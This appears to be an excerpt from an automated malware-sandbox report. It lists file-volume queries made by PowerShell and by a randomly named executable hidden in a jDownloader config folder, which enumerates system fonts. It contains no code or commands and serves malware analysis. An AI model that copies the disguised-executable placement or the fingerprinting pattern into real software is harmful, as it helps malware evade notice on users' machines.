Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Program Files (x86)\jDownloader\config\qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe	Queries volume information: C:\Program Files (x86)\jDownloader\config\qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe VolumeInformation
Source: C:\Program Files (x86)\jDownloader\config\qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Program Files (x86)\jDownloader\config\qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
Source: C:\Program Files (x86)\jDownloader\config\qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
Source: C:\Program Files (x86)\jDownloader\config\qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
Source: C:\Program Files (x86)\jDownloader\config\qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
Source: C:\Program Files (x86)\jDownloader\config\qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe	Queries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformation
Source: C:\Program Files (x86)\jDownloader\config\qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe	Queries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformation
Source: C:\Program Files (x86)\jDownloader\config\qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe	Queries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformation
Source: C:\Program Files (x86)\jDownloader\config\qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe	Queries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation
Source: C:\Program Files (x86)\jDownloader\config\qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe	Queries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformation
Source: C:\Program Files (x86)\jDownloader\config\qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe	Queries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformation
Source: C:\Program Files (x86)\jDownloader\config\qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe	Queries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformation
Source: C:\Program Files (x86)\jDownloader\config\qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe	Queries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation
Source: C:\Program Files (x86)\jDownloader\config\qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe	Queries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformation
Source: C:\Program Files (x86)\jDownloader\config\qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe	Queries volume information: C:\Windows\Fonts\Candaral.ttf VolumeInformation
Source: C:\Program Files (x86)\jDownloader\config\qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe	Queries volume information: C:\Windows\Fonts\Candarali.ttf VolumeInformation
Source: C:\Program Files (x86)\jDownloader\config\qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe	Queries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation
Source: C:\Program Files (x86)\jDownloader\config\qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe	Queries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation
Source: C:\Program Files (x86)\jDownloader\config\qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe	Queries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation
Source: C:\Program Files (x86)\jDownloader\config\qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe	Queries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation
Source: C:\Program Files (x86)\jDownloader\config\qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe	Queries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation
Source: C:\Program Files (x86)\jDownloader\config\qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe	Queries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation
Source: C:\Program Files (x86)\jDownloader\config\qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe	Queries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation
Source: C:\Program Files (x86)\jDownloader\config\qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe	Queries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation
Source: C:\Program Files (x86)\jDownloader\config\qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe	Queries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation
Source: C:\Program Files (x86)\jDownloader\config\qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe	Queries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation
Source: C:\Program Files (x86)\jDownloader\config\qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe	Queries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation
Source: C:\Program Files (x86)\jDownloader\config\qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe	Queries volume information: C:\Windows\Fonts\corbell.ttf VolumeInformation
Source: C:\Program Files (x86)\jDownloader\config\qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe	Queries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation
Source: C:\Program Files (x86)\jDownloader\config\qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe	Queries volume information: C:\Windows\Fonts\corbelli.ttf VolumeInformation
Source: C:\Program Files (x86)\jDownloader\config\qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe	Queries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation
Source: C:\Program Files (x86)\jDownloader\config\qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe	Queries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformation
Source: C:\Program Files (x86)\jDownloader\config\qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe	Queries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation
Source: C:\Program Files (x86)\jDownloader\config\qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe	Queries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation
Source: C:\Program Files (x86)\jDownloader\config\qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe	Queries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation
Source: C:\Program Files (x86)\jDownloader\config\qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe	Queries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation
Source: C:\Program Files (x86)\jDownloader\config\qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe	Queries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformation
Source: C:\Program Files (x86)\jDownloader\config\qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe	Queries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformation
Source: C:\Program Files (x86)\jDownloader\config\qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe	Queries volume information: C:\Windows\Fonts\framd.ttf VolumeInformation
Source: C:\Program Files (x86)\jDownloader\config\qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe	Queries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformation
Source: C:\Program Files (x86)\jDownloader\config\qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe	Queries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformation
Source: C:\Program Files (x86)\jDownloader\config\qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe	Queries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformation
Source: C:\Program Files (x86)\jDownloader\config\qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe	Queries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformation
Source: C:\Program Files (x86)\jDownloader\config\qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe	Queries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformation
Source: C:\Program Files (x86)\jDownloader\config\qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe	Queries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformation
Source: C:\Program Files (x86)\jDownloader\config\qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe	Queries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformation
Source: C:\Program Files (x86)\jDownloader\config\qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe	Queries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformation
Source: C:\Program Files (x86)\jDownloader\config\qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe	Queries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformation
Source: C:\Program Files (x86)\jDownloader\config\qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe	Queries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformation
Source: C:\Program Files (x86)\jDownloader\config\qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe	Queries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformation
Source: C:\Program Files (x86)\jDownloader\config\qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe	Queries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformation
Source: C:\Program Files (x86)\jDownloader\config\qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe	Queries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformation
Source: C:\Program Files (x86)\jDownloader\config\qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe	Queries volume information: C:\Windows\Fonts\impact.ttf VolumeInformation
Source: C:\Program Files (x86)\jDownloader\config\qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe	Queries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformation
Source: C:\Program Files (x86)\jDownloader\config\qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe	Queries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformation
Source: C:\Program Files (x86)\jDownloader\config\qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe	Queries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformation
Source: C:\Program Files (x86)\jDownloader\config\qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe	Queries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformation
Source: C:\Program Files (x86)\jDownloader\config\qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe	Queries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformation
Source: C:\Program Files (x86)\jDownloader\config\qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe	Queries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformation
Source: C:\Program Files (x86)\jDownloader\config\qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe	Queries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformation
Source: C:\Program Files (x86)\jDownloader\config\qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe	Queries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformation
Source: C:\Program Files (x86)\jDownloader\config\qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe	Queries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformation
Source: C:\Program Files (x86)\jDownloader\config\qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe	Queries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformation
Source: C:\Program Files (x86)\jDownloader\config\qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe	Queries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformation
Source: C:\Program Files (x86)\jDownloader\config\qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe	Queries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation
Source: C:\Program Files (x86)\jDownloader\config\qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe	Queries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation
Source: C:\Program Files (x86)\jDownloader\config\qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe	Queries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation
Source: C:\Program Files (x86)\jDownloader\config\qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe	Queries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation
Source: C:\Program Files (x86)\jDownloader\config\qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe	Queries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation
Source: C:\Program Files (x86)\jDownloader\config\qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe	Queries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation
Source: C:\Program Files (x86)\jDownloader\config\qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe	Queries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformation
Source: C:\Program Files (x86)\jDownloader\config\qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe	Queries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformation
Source: C:\Program Files (x86)\jDownloader\config\qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe	Queries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformation
Source: C:\Program Files (x86)\jDownloader\config\qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe	Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
Source: C:\Program Files (x86)\jDownloader\config\qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe	Queries volume information: C:\Windows\Fonts\taile.ttf VolumeInformation
Source: C:\Program Files (x86)\jDownloader\config\qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe	Queries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformation
Source: C:\Program Files (x86)\jDownloader\config\qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe	Queries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation
Source: C:\Program Files (x86)\jDownloader\config\qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe	Queries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation
Source: C:\Program Files (x86)\jDownloader\config\qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe	Queries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation
Source: C:\Program Files (x86)\jDownloader\config\qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe	Queries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation
Source: C:\Program Files (x86)\jDownloader\config\qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe	Queries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation
Source: C:\Program Files (x86)\jDownloader\config\qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe	Queries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation
Source: C:\Program Files (x86)\jDownloader\config\qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe	Queries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformation
Source: C:\Program Files (x86)\jDownloader\config\qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe	Queries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation
Source: C:\Program Files (x86)\jDownloader\config\qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe	Queries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation
Source: C:\Program Files (x86)\jDownloader\config\qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe	Queries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformation
Source: C:\Program Files (x86)\jDownloader\config\qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe	Queries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation
Source: C:\Program Files (x86)\jDownloader\config\qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe	Queries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation
Source: C:\Program Files (x86)\jDownloader\config\qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe	Queries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformation
Source: C:\Program Files (x86)\jDownloader\config\qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe	Queries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformation
Source: C:\Program Files (x86)\jDownloader\config\qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe	Queries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformation
Source: C:\Program Files (x86)\jDownloader\config\qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe	Queries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformation
Source: C:\Program Files (x86)\jDownloader\config\qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe	Queries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformation
Source: C:\Program Files (x86)\jDownloader\config\qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe	Queries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformation
Source: C:\Program Files (x86)\jDownloader\config\qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe	Queries volume information: C:\Windows\Fonts\pala.ttf VolumeInformation
Source: C:\Program Files (x86)\jDownloader\config\qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe	Queries volume information: C:\Windows\Fonts\palai.ttf VolumeInformation
Source: C:\Program Files (x86)\jDownloader\config\qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe	Queries volume information: C:\Windows\Fonts\palab.ttf VolumeInformation
Source: C:\Program Files (x86)\jDownloader\config\qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe	Queries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformation
Source: C:\Program Files (x86)\jDownloader\config\qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe	Queries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformation
Source: C:\Program Files (x86)\jDownloader\config\qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe	Queries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformation
Source: C:\Program Files (x86)\jDownloader\config\qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe	Queries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformation
Source: C:\Program Files (x86)\jDownloader\config\qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe	Queries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformation
Source: C:\Program Files (x86)\jDownloader\config\qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe	Queries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformation
Source: C:\Program Files (x86)\jDownloader\config\qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe	Queries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformation
Source: C:\Program Files (x86)\jDownloader\config\qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe	Queries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation
Source: C:\Program Files (x86)\jDownloader\config\qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe	Queries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation
Source: C:\Program Files (x86)\jDownloader\config\qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe	Queries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation
Source: C:\Program Files (x86)\jDownloader\config\qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe	Queries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation
Source: C:\Program Files (x86)\jDownloader\config\qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe	Queries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation
Source: C:\Program Files (x86)\jDownloader\config\qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe	Queries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation
Source: C:\Program Files (x86)\jDownloader\config\qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe	Queries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation
Source: C:\Program Files (x86)\jDownloader\config\qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe	Queries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation
Source: C:\Program Files (x86)\jDownloader\config\qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe	Queries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation
Source: C:\Program Files (x86)\jDownloader\config\qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe	Queries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation
Source: C:\Program Files (x86)\jDownloader\config\qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe	Queries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation
Source: C:\Program Files (x86)\jDownloader\config\qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe	Queries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation
Source: C:\Program Files (x86)\jDownloader\config\qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe	Queries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation
Source: C:\Program Files (x86)\jDownloader\config\qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe	Queries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation
Source: C:\Program Files (x86)\jDownloader\config\qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe	Queries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation
Source: C:\Program Files (x86)\jDownloader\config\qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe	Queries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation
Source: C:\Program Files (x86)\jDownloader\config\qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe	Queries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation
Source: C:\Program Files (x86)\jDownloader\config\qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe	Queries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformation
Source: C:\Program Files (x86)\jDownloader\config\qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe	Queries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformation
Source: C:\Program Files (x86)\jDownloader\config\qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe	Queries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation
Source: C:\Program Files (x86)\jDownloader\config\qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe	Queries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformation
Source: C:\Program Files (x86)\jDownloader\config\qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe	Queries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformation
Source: C:\Program Files (x86)\jDownloader\config\qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe	Queries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformation
Source: C:\Program Files (x86)\jDownloader\config\qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe	Queries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformation
Source: C:\Program Files (x86)\jDownloader\config\qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe	Queries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformation
Source: C:\Program Files (x86)\jDownloader\config\qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe	Queries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformation
Source: C:\Program Files (x86)\jDownloader\config\qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe	Queries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation
Source: C:\Program Files (x86)\jDownloader\config\qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe	Queries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformation
Source: C:\Program Files (x86)\jDownloader\config\qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe	Queries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformation
